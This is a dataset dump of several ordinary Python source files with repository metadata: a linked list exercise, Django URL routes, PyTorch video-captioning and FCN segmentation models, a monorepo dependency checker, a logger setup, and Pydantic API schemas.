| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903025199c8cb18d7b43068916c16d96cb4139f2
| 2,967
|
py
|
Python
|
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""
Module 100-singly_linked_list
Defines class Node (with private data and next_node)
Defines class SinglyLinkedList (with private head and public sorted_insert)
"""
class Node:
"""
class Node definition
Args:
data (int): private
next_node : private; can be None or Node object
Functions:
__init__(self, data, next_node=None)
data(self)
data(self, value)
next_node(self)
next_node(self, value)
"""
def __init__(self, data, next_node=None):
"""
Initializes node
Attributes:
data (int): private
next_node : private; can be None or Node object
"""
self.data = data
self.next_node = next_node
@property
def data(self):
""""
Getter
Return: data
"""
return self.__data
@data.setter
def data(self, value):
"""
Setter
Args:
value: sets data to value if int
"""
if type(value) is not int:
raise TypeError("data must be an integer")
else:
self.__data = value
@property
def next_node(self):
""""
Getter
Return: next_node
"""
return self.__next_node
@next_node.setter
def next_node(self, value):
"""
Setter
Args:
value: sets next_node if value is next_node or None
"""
if type(value) is not Node and value is not None:
raise TypeError("next_node must be a Node object")
else:
self.__next_node = value
class SinglyLinkedList:
"""
class SinglyLinkedList definition
Args:
head: private
Functions:
__init__(self)
sorted_insert(self, value)
"""
def __init__(self):
"""
Initializes singly linked list
Attributes:
head: private
"""
self.__head = None
def __str__(self):
"""
String representation of singly linked list needed to print
"""
string = ""
tmp = self.__head
while tmp is not None:
string += str(tmp.data)
tmp = tmp.next_node
if tmp is not None:
string += "\n"
return string
def sorted_insert(self, value):
"""
Inserts new nodes into singly linked list in sorted order
Args:
value: int data for node
"""
new = Node(value)
if self.__head is None:
self.__head = new
return
tmp = self.__head
if new.data < tmp.data:
new.next_node = self.__head
self.__head = new
return
while (tmp.next_node is not None) and (new.data > tmp.next_node.data):
tmp = tmp.next_node
new.next_node = tmp.next_node
tmp.next_node = new
return
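# Illustrative usage:
#   sll = SinglyLinkedList()
#   for value in (3, 1, 2):
#       sll.sorted_insert(value)
#   print(sll)  # prints 1, 2 and 3 on separate lines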
| 23.179688
| 78
| 0.532524
| 340
| 2,967
| 4.432353
| 0.202941
| 0.138023
| 0.043796
| 0.023889
| 0.272064
| 0.135368
| 0.066357
| 0.066357
| 0.066357
| 0.066357
| 0
| 0.002193
| 0.385238
| 2,967
| 127
| 79
| 23.362205
| 0.824013
| 0.343108
| 0
| 0.265306
| 0
| 0
| 0.035692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163265
| false
| 0
| 0
| 0
| 0.326531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90303a8de55d76b20b74b604783236c6d15111a5
| 310
|
py
|
Python
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 20
|
2016-05-15T10:39:53.000Z
|
2022-03-29T00:06:06.000Z
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 3
|
2017-05-27T16:44:01.000Z
|
2019-01-02T21:02:59.000Z
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 11
|
2018-08-22T21:16:32.000Z
|
2021-04-10T22:42:34.000Z
|
from django.conf.urls import url
from . import views
app_name = 'campaigns'
urlpatterns = [
url( r'^$', views.JsonView.response, name='index' ),
url( r'^(?P<app_code>[a-zA-Z0-9]+)/info/$', views.info, name='info' ),
url( r'^(?P<app_code>[a-zA-Z0-9]+)/services/$', views.services, name='services' ),
]
| 25.833333
| 84
| 0.632258
| 48
| 310
| 4.020833
| 0.479167
| 0.062176
| 0.051813
| 0.082902
| 0.186529
| 0.186529
| 0.186529
| 0.186529
| 0.186529
| 0
| 0
| 0.01476
| 0.125806
| 310
| 11
| 85
| 28.181818
| 0.697417
| 0
| 0
| 0
| 0
| 0
| 0.322581
| 0.232258
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9032381dcc04f711d03772a06dc91a54a4d1b366
| 5,802
|
py
|
Python
|
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | 3
|
2020-05-16T23:59:57.000Z
|
2021-06-14T01:59:41.000Z
|
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | null | null | null |
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | 3
|
2020-05-17T00:01:01.000Z
|
2020-07-28T18:04:05.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
class Gated_Sum(nn.Module):
def __init__(self, opt):
super(Gated_Sum, self).__init__()
hidden_size = opt['dim_hidden']
nf = opt.get('num_factor', 512)
self.hidden_size = hidden_size
self.num_feats = len(opt['modality']) - sum(opt['skip_info'])
#self.emb_weight = Parameter(torch.Tensor(self.num_feats * hidden_size, hidden_size))
#self.emb_bias = Parameter(torch.Tensor(self.num_feats * hidden_size))
self.weight_a = Parameter(torch.Tensor(self.num_feats * hidden_size, nf))
self.weight_b = Parameter(torch.Tensor(nf, self.num_feats))
self.weight_c = Parameter(torch.Tensor(nf, hidden_size))
self.bias = Parameter(torch.Tensor(self.num_feats * hidden_size))
self.dropout = nn.Dropout(0.5)
self.reset_parameters()
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
weight.data.uniform_(-stdv, stdv)
def get_gated_result(self, weight, bias, feats, index):
assert len(feats) == self.num_feats
#assert len(feats.shape)
#ew = self.emb_weight.chunk(self.num_feats, 0)
#eb = self.emb_bias.chunk(self.num_feats, 0)
w = weight.chunk(self.num_feats, 0)
b = bias.chunk(self.num_feats, 0)
res = []
for i in range(self.num_feats):
#if i == index:
# emb = F.linear(feats[i], ew[i], eb[i])
res.append(F.linear(self.dropout(feats[i]), w[i], b[i]))
#res.append(F.linear(feats[i], w[i], b[i]))
gated_result = F.sigmoid(torch.stack(res, 0).sum(0)) * feats[index]
#gated_result = F.sigmoid(torch.stack(res, 0).sum(0)) * emb
return gated_result
def forward(self, encoder_outputs):
bsz, seq_len, _ = encoder_outputs[0].shape
feats = [item.contiguous().view(bsz * seq_len, -1) for item in encoder_outputs]
#feats = [self.dropout(item.contiguous().view(bsz * seq_len, -1)) for item in encoder_outputs]
gated_results = []
for i in range(self.num_feats):
tag = torch.zeros(self.num_feats, 1).to(feats[0].device)
tag[i] = 1
#query = feats[i].mean(0).unsqueeze(0).repeat(self.num_feats, 1) # [3, dim]
#key = torch.stack(feats, 1).mean(0) # [3, dim]
#tag = F.cosine_similarity(query, key).unsqueeze(1)
weight_mid = torch.mm(self.weight_b, tag)
weight_mid = torch.diag(weight_mid.squeeze(1))
weight = torch.mm(torch.mm(self.weight_a, weight_mid), self.weight_c)
gated_results.append(self.get_gated_result(weight, self.bias, feats, i))
gated_results = torch.stack(gated_results, 0).sum(0)
gated_results = gated_results.contiguous().view(bsz, seq_len, self.hidden_size)
return gated_results
class Joint_Representaion_Learner(nn.Module):
def __init__(self, feats_size, opt):
super(Joint_Representaion_Learner, self).__init__()
self.encoder_type = opt['encoder_type']
self.decoder_type = opt['decoder_type']
self.addition = opt.get('addition', False)
self.temporal_concat = opt.get('temporal_concat', False)
self.opt = opt
self.att = None
if opt['multi_scale_context_attention']:
from models.rnn import Multi_Scale_Context_Attention
self.att = Multi_Scale_Context_Attention(opt)
if opt.get('gated_sum', False):
self.att = Gated_Sum(opt)
self.bn_list = []
if not opt['no_encoder_bn']:
if self.addition:
feats_size = [feats_size[0]]
print(self.addition)
print(feats_size)
for i, item in enumerate(feats_size):
tmp_module = nn.BatchNorm1d(item)
self.bn_list.append(tmp_module)
self.add_module("bn%d"%(i), tmp_module)
def forward(self, encoder_outputs, encoder_hiddens):
if (self.decoder_type != 'ENSEMBLE' and self.encoder_type == 'GRU' and not self.opt.get('two_stream', False)) \
or self.encoder_type == 'IEL' \
or (self.encoder_type == 'IPE' and self.opt.get('MSLSTM', False)):
if isinstance(encoder_hiddens[0], tuple):
hx = []
cx = []
for h in encoder_hiddens:
hx.append(h[0])
cx.append(h[1])
encoder_hiddens = (torch.stack(hx, dim=0).mean(0), torch.stack(cx, dim=0).mean(0))
else:
encoder_hiddens = torch.stack(encoder_hiddens, dim=0).mean(0)
if self.att is not None:
encoder_outputs = self.att(encoder_outputs)
if self.addition:
assert isinstance(encoder_outputs, list)
encoder_outputs = torch.stack(encoder_outputs, dim=0).mean(0)
#encoder_outputs = torch.stack(encoder_outputs, dim=0).max(0)[0]
encoder_outputs = encoder_outputs if isinstance(encoder_outputs, list) else [encoder_outputs]
if len(self.bn_list):
assert len(encoder_outputs) == len(self.bn_list)
for i in range(len(encoder_outputs)):
batch_size, seq_len, _ = encoder_outputs[i].shape
encoder_outputs[i] = self.bn_list[i](encoder_outputs[i].contiguous().view(batch_size * seq_len, -1)).view(batch_size, seq_len, -1)
if self.temporal_concat:
assert isinstance(encoder_outputs, list)
encoder_outputs = torch.cat(encoder_outputs, dim=1)
#print(encoder_outputs.shape)
return encoder_outputs, encoder_hiddens
| 39.739726
| 146
| 0.601344
| 771
| 5,802
| 4.30869
| 0.178988
| 0.109573
| 0.054184
| 0.028898
| 0.276039
| 0.219446
| 0.173691
| 0.159843
| 0.083082
| 0.083082
| 0
| 0.012114
| 0.274388
| 5,802
| 146
| 147
| 39.739726
| 0.77696
| 0.13909
| 0
| 0.06383
| 0
| 0
| 0.034545
| 0.005824
| 0
| 0
| 0
| 0
| 0.042553
| 1
| 0.06383
| false
| 0
| 0.031915
| 0
| 0.148936
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9034fc76134be07855830d17f0d402a691811b26
| 2,489
|
py
|
Python
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 26
|
2018-11-29T13:33:25.000Z
|
2021-11-22T18:45:19.000Z
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 14
|
2019-01-20T00:07:13.000Z
|
2020-07-15T13:19:29.000Z
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 2
|
2019-02-25T17:31:47.000Z
|
2020-01-22T22:10:41.000Z
|
import collections
from scream.files import Docs, Scream, Tox
class Monorepo(object):
def __init__(self, root_dir):
self.root_dir = root_dir
self.config = Scream(self.root_dir)
def sync(self):
"""Used internally ensure monorepo maintains certain standards.
"""
self.config = Scream(self.root_dir)
Tox(self.config.packages).write(self.root_dir)
Docs(self.config.packages).write(self.root_dir)
def validate_mono_repo(self):
all_pypi_packages = self.get_all_pypi_packages()
warn_unpinned = self.warn_unpinned_packages(all_pypi_packages)
warn_dependency_conflict = self.warn_dependency_conflict(all_pypi_packages)
for package in self.config.packages:
self.intersect_warning(package.package_name, "has unpinned dependencies",
warn_unpinned, package.other_dependencies)
self.intersect_warning(package.package_name, "more than 1 package has a different version for",
warn_dependency_conflict, package.other_dependencies)
def warn_unpinned_packages(self, pypi_packages):
to_report_packages = []
for p in pypi_packages:
if "==" not in p:
to_report_packages.append(p)
return to_report_packages
def warn_dependency_conflict(self, pypi_packages):
to_report_packages = []
counts = version_counter(pypi_packages)
for p in pypi_packages:
if len(counts[(p.split("==")[0])]) > 1:
to_report_packages.append(p)
return to_report_packages
def get_all_pypi_packages(self):
p = []
for package in self.config.packages:
p.extend(package.other_dependencies)
return p
@staticmethod
def intersect_warning(name, description, list1, list2):
intersect = set(list1).intersection(set(list2))
if intersect:
print("Warning: Package {name} {description}: {intersect}.".format(
name=name,
description=description,
intersect=', '.join(intersect)
))
def version_counter(pypi_packages):
results = collections.defaultdict(set)
for p in pypi_packages:
try:
name, version = p.split("==")
except Exception:
name = p.split("==")[0]
version = 'LATEST'
results[name].update([version])
return results
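# Illustrative example: for pypi_packages = ["requests==2.0", "requests==2.1", "six"],
# version_counter() maps "requests" -> {"2.0", "2.1"} and "six" -> {"LATEST"}, so
# warn_dependency_conflict() reports both pinned requests entries and
# warn_unpinned_packages() reports "six".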
| 34.09589
| 107
| 0.627561
| 280
| 2,489
| 5.335714
| 0.282143
| 0.096386
| 0.044177
| 0.02008
| 0.323963
| 0.311914
| 0.147256
| 0.064257
| 0.064257
| 0.064257
| 0
| 0.004469
| 0.280836
| 2,489
| 72
| 108
| 34.569444
| 0.830168
| 0.024106
| 0
| 0.232143
| 0
| 0
| 0.057581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.035714
| 0
| 0.267857
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9037bc76d22fa05dd0f3bfed5e08c4fd3d0cc516
| 538
|
py
|
Python
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 16
|
2020-03-19T15:12:28.000Z
|
2021-12-20T06:02:32.000Z
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 14
|
2020-03-23T03:57:00.000Z
|
2021-12-20T05:53:33.000Z
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 7
|
2020-03-25T00:30:18.000Z
|
2021-01-31T18:45:09.000Z
|
import logging
import os
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[%(lineno)d] %(levelname)s %(message)s')
logger = logging.getLogger()
dir_name = os.path.join("/tmp", "tbase")
if not os.path.exists(dir_name):
os.makedirs(dir_name)
handler = logging.FileHandler(os.path.join(dir_name, "tbase.log"))
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[%(lineno)d] %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
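# Illustrative usage: importing this module configures logging once, so callers
# can do `from tbase.common.logger import logger` and `logger.info("message")`
# to write both to the console and to /tmp/tbase/tbase.log.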
| 26.9
| 76
| 0.723048
| 74
| 538
| 5.202703
| 0.445946
| 0.072727
| 0.083117
| 0.088312
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0
| 0
| 0.10223
| 538
| 19
| 77
| 28.315789
| 0.797101
| 0
| 0
| 0
| 0
| 0.133333
| 0.263941
| 0.089219
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903bd4a9af5949595a7b7528cd44f5048565dedd
| 10,070
|
py
|
Python
|
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsample_filter(size):
"""Make a 2D bilinear kernel suitable for upsampling"""
factor = (size + 1) // 2
if size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:size, :size]
filter = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
return torch.from_numpy(filter).float()
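# Illustrative example (follows from the formula above): get_upsample_filter(4)
# gives factor=2 and center=1.5, so the 1-D weights are [0.25, 0.75, 0.75, 0.25]
# and the returned 4x4 kernel is their outer product.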
class FCN32s_BN(nn.Module):
def __init__(self, n_class=21, nodeconv=False):
super(FCN32s_BN, self).__init__()
self.nodeconv = nodeconv
self.conv1 = nn.Sequential(
# conv1
nn.Conv2d(3, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/2
)
self.conv2 = nn.Sequential(
# conv2
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/4
)
self.conv3 = nn.Sequential(
# conv3
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/8
)
self.conv4 = nn.Sequential(
# conv4
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/16
)
self.conv5 = nn.Sequential(
# conv5
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/32
)
self.classifier = nn.Sequential(
# fc6
nn.Conv2d(512, 1024, 7, padding=1),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True),
nn.Dropout2d(),
# fc7
nn.Conv2d(1024, 1024, 1, padding=1),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True),
nn.Dropout2d(),
# score_fr
nn.Conv2d(1024, n_class, 1, padding=1),
)
self.maxPool_fc = nn.Sequential(
nn.MaxPool2d(2, stride=2, ceil_mode=True),
nn.BatchNorm2d(512),
)
self.upscore = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore4 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore3 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore2 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore1 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.score4 = nn.Sequential(
# torch.nn.Conv2d(in_channels, out_channels, kernel_size,
# stride=1, padding=0, dilation=1,
# groups=1, bias=True)
# batch x 1 x 28 x 28 -> batch x 512
nn.Conv2d(512, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score3 = nn.Sequential(
nn.Conv2d(256, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score2 = nn.Sequential(
nn.Conv2d(128, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score1 = nn.Sequential(
nn.Conv2d(64, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0, 0.01)
if m.bias is not None:
m.bias.data.zero_()
if isinstance(m, nn.ConvTranspose2d):
m.weight.data.normal_(0, 0.01)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
#print("input size = %s"%(str(x.size())))
hc1 = self.conv1(x)
#print("conv1 size = %s"%(str(hc1.size())))
hc2 = self.conv2(hc1)
#print("conv2 size = %s"%(str(hc2.size())))
hc3 = self.conv3(hc2)
#print("conv3 size = %s"%(str(hc3.size())))
hc4 = self.conv4(hc3)
#print("conv4 size = %s"%(str(hc4.size())))
hc5 = self.conv5(hc4)
#print("conv5 size = %s"%(str(hc5.size())))
hc5_f = self.maxPool_fc(hc5)
hc5_f = hc5_f.view(-1,8*8*512)
ha = self.classifier(hc5)
# #print("classifer size = %s"%(str(ha.size())))
hs4 = self.score4(hc4)
hd4 = self.upscore4(ha)
hf4 = torch.add(hs4, hd4)
# #print("deconv4 size = %s"%(str(hf4.size())))
hs3 = self.score3(hc3)
hd3 = self.upscore3(hf4)
hf3 = torch.add(hs3, hd3)
# #print("deconv3 size = %s"%(str(hf3.size())))
hs2 = self.score2(hc2)
hd2 = self.upscore2(hf3)
hf2 = torch.add(hs2, hd2)
# #print("deconv2 size = %s"%(str(hf2.size())))
hs1 = self.score1(hc1)
hd1 = self.upscore1(hf2)
hf1 = torch.add(hs1, hd1)
# #print("deconv1 size = %s"%(str(hf1.size())))
h = self.upscore(hf1)
# #print("output size = %s"%(str(h.size())))
return h
def copy_params_from_vgg16(self, vgg16, copy_classifier=True, copy_fc8=True, init_upscore=True):
self.conv1[0].weight.data = vgg16.features[0].weight.data;
self.conv1[0].bias.data = vgg16.features[0].bias.data;
self.conv1[3].weight.data = vgg16.features[2].weight.data;
self.conv1[3].bias.data = vgg16.features[2].bias.data;
self.conv2[0].weight.data = vgg16.features[5].weight.data;
self.conv2[0].bias.data = vgg16.features[5].bias.data;
self.conv2[3].weight.data = vgg16.features[7].weight.data;
self.conv2[3].bias.data = vgg16.features[7].bias.data;
self.conv3[0].weight.data = vgg16.features[10].weight.data;
self.conv3[0].bias.data = vgg16.features[10].bias.data;
self.conv3[3].weight.data = vgg16.features[12].weight.data;
self.conv3[3].bias.data = vgg16.features[12].bias.data;
self.conv3[6].weight.data = vgg16.features[14].weight.data;
self.conv3[6].bias.data = vgg16.features[14].bias.data;
self.conv4[0].weight.data = vgg16.features[17].weight.data;
self.conv4[0].bias.data = vgg16.features[17].bias.data;
self.conv4[3].weight.data = vgg16.features[19].weight.data;
self.conv4[3].bias.data = vgg16.features[19].bias.data;
self.conv4[6].weight.data = vgg16.features[21].weight.data;
self.conv4[6].bias.data = vgg16.features[21].bias.data;
self.conv5[0].weight.data = vgg16.features[24].weight.data;
self.conv5[0].bias.data = vgg16.features[24].bias.data;
self.conv5[3].weight.data = vgg16.features[26].weight.data;
self.conv5[3].bias.data = vgg16.features[26].bias.data;
self.conv5[6].weight.data = vgg16.features[28].weight.data;
self.conv5[6].bias.data = vgg16.features[28].bias.data;
if copy_classifier:
for i in [0, 3]:
l1 = vgg16.classifier[i]
l2 = self.classifier[i]
l2.weight.data = l1.weight.data.view(l2.weight.size())
l2.bias.data = l1.bias.data.view(l2.bias.size())
n_class = self.classifier[6].weight.size()[0]
if copy_fc8:
l1 = vgg16.classifier[6]
l2 = self.classifier[6]
l2.weight.data = l1.weight.data[:n_class, :].view(l2.weight.size())
l2.bias.data = l1.bias.data[:n_class]
if init_upscore:
# initialize upscore layer
c1, c2, h, w = self.upscore.weight.data.size()
assert c1 == c2 == n_class
assert h == w
weight = get_upsample_filter(h)
self.upscore.weight.data = \
weight.view(1, 1, h, w).repeat(c1, c2, 1, 1)
| 36.751825
| 101
| 0.523932
| 1,279
| 10,070
| 4.061767
| 0.139171
| 0.065448
| 0.085082
| 0.060635
| 0.47719
| 0.362079
| 0.350529
| 0.350529
| 0.344562
| 0.344562
| 0
| 0.092868
| 0.331678
| 10,070
| 273
| 102
| 36.886447
| 0.679049
| 0.090765
| 0
| 0.325123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009852
| 1
| 0.024631
| false
| 0
| 0.019704
| 0
| 0.059113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903c7397f31fe34f15318c7f6541642d7c880c26
| 1,067
|
py
|
Python
|
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | null | null | null |
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | 1
|
2021-09-05T15:39:56.000Z
|
2021-09-05T20:26:39.000Z
|
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | null | null | null |
from pydantic import BaseModel
from typing import List
# The models in this module are used by the API for type validation;
# FastAPI relies on Pydantic for data validation.
class GeographySchema(BaseModel):
id: int
short_name: str
name: str
class EntrySchema(BaseModel):
id: str
unit: str
geography_id: int
product_name: str
class Config:
orm_mode = True
class IndicatorSchema(BaseModel):
id: int
method: str
category: str
indicator: str
unit: str
class Config:
orm_mode = True
class ImpactSchema(BaseModel):
id: int
indicator_id: int
entry_id: int
coefficient: float
class Config:
orm_mode = True
class ImpactSchemaExtended(BaseModel):
id: int
indicator: IndicatorSchema
entry: EntrySchema
coefficient: float
class EntrySchemaExtended(BaseModel):
id: str
product_name: str
geography: GeographySchema
unit: str
impact: List[ImpactSchema]
class Config:
orm_mode = True
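# Minimal usage sketch (hypothetical data, not part of this module): with
# orm_mode enabled, EntrySchema can be built from any object exposing the
# same attributes (e.g. a SQLAlchemy row) via from_orm().
class _FakeEntryRow:
    id = "entry-001"
    unit = "kg"
    geography_id = 1
    product_name = "wheat"

entry = EntrySchema.from_orm(_FakeEntryRow())
print(entry.json())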
| 17.209677
| 58
| 0.68135
| 129
| 1,067
| 5.55814
| 0.403101
| 0.048815
| 0.078103
| 0.100418
| 0.152022
| 0.121339
| 0.083682
| 0
| 0
| 0
| 0
| 0
| 0.266167
| 1,067
| 61
| 59
| 17.491803
| 0.915709
| 0.135895
| 0
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04878
| 0
| 0.902439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903de14b44d3f2b0857467165c0169f5dac5d5b8
| 404
|
py
|
Python
|
app.py
|
